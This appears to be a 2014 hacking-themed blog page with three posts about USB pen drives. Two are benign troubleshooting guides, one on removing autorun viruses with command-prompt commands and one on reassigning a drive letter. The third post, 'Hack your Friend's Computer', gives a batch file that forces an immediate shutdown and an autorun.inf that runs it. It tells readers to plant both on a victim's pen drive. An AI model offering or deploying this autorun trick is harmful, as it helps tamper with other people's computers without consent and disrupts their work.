Showing posts with label USB Crack. Show all posts
Showing posts with label USB Crack. Show all posts

Tuesday, 14 October 2014

How to Remove virus from Pen Drive Using Command Prompt

Hi Friends!

Dear HackVenture readers today I
am going to tell you How to Remove
virus Using Command Prompt. Your Pendrive virus can be
easily be removed using this technique.

There are certain steps through which
you can remove a virus using command prompt

The very important thing you have to do is
Important: Make sure that no other processes
being running while performing these actions.

Step 1.
Press Windows+R run dialogue box open and type
cmd



Step 2.
Open the infected drive such as write , g: to go to G drive.
Now type dir/w/a . It will show all the files of the drive
including hidden files.
Locate AUTORUN.INF or any Virus and other suspicious
files in the directory.
here was no virus in my drive so only autorun.inf is been
highlighted







Step 3.
Type command attrib  -r –a –s –h to remove attributes
of corresponding file.





Step 4.
Type del autorun.inf to delete autorun.inf file.



Step 5.
Now type del virus name.exe t delete it,
eg : del newfolder.exe .

(You can also delete viruses by using following steps:
When you find an Autorun.inf file or any other unusual .exe
file just rename it.

Syntax for rename is (rename filename.extension new name ,
for example: (rename autorun.inf virus) to rename autorun.inf
file. Here I have renamed it by “virus”.


Now you can access the defected drive without
affecting the virus.
To delete the renamed file go to the defected drive
and select the file you renamed.

Now delete the harmful renamed files.)
You have deleted that virus successfully
but sometimes virus resides in the Recycler folder.
To locate this folder:
Type cd recycler command.

Again type dir/w/a  to locate all file of the folder.
Identify malicious files and delete them using
above commands.

Follow the above steps carefully
and i think this information is enough
to remove a virus using command prompt easily.


Thank You !

+ Muzammil Khan

What you think on this article,
Please leave your valuable comments
in comment box below.



Thursday, 9 October 2014

How to Fix Pen Drive is Detected but not showing in My Computer Problem

Hi Friends!

Today I am telling you a trick
How to Fix Pen Drive is Detected
but not showing in My Computer
Problem...

This is a common pen drive problem
which happens with new pen drives.
You may also face same problem with
other external devices like flash drives,
Memory cards or external HDD. Due to this
problem, whenever we plug in any external
device to our computer, it gets detected
easily but it doesn’t start to appear in My computer.
This problem can be easily fixed
by follow certain steps

Step 1.
Press windows+R to launch run dialogue box.
Type compmgmt.msc.
A Computer Management window will open

Step 2.
Now select Disk Management from left hand corner



Step 3.
In disk management select your external pen drive.
Now Right click on it
Select “Change Drive letter and paths”

Step 4.
Now click on “Change” to assign a new drive letter
to your pen drive. One thing to notice here is always
assign the name which is not already being used by any
other drive.

Step 5.
Now your pen drive shows in My Computer if not
then restart your computer.



What you think on this article,
Please leave your valuable comments
in comment box below.

Thank You!

+ Muzammil Khan



Saturday, 4 October 2014

Hack your Friend's Computer by using a Pendrive


Hi Friends!

Today I am telling you a trick
from which you can hack your
friend's computer by using a
simple PenDrive.

Step 1.
Copy this Code into Notepad
@echo off
shutdown -s -t 00
Save as hackventure.bat extension (for eg: hackventure.bat).

Step 2.
Open your Notepad and Copy this Code

[autorun]
Open=hackventure.bat
Action=Mouse Disable

   Save it as "autorun.inf"

Step 3.
 Then copy the two files in your pen drive or victim's pen drive.
That's all whenever the victim insert his pen drive,the system will
 be turned off automatically.

Thank You!

+ Muzammil Khan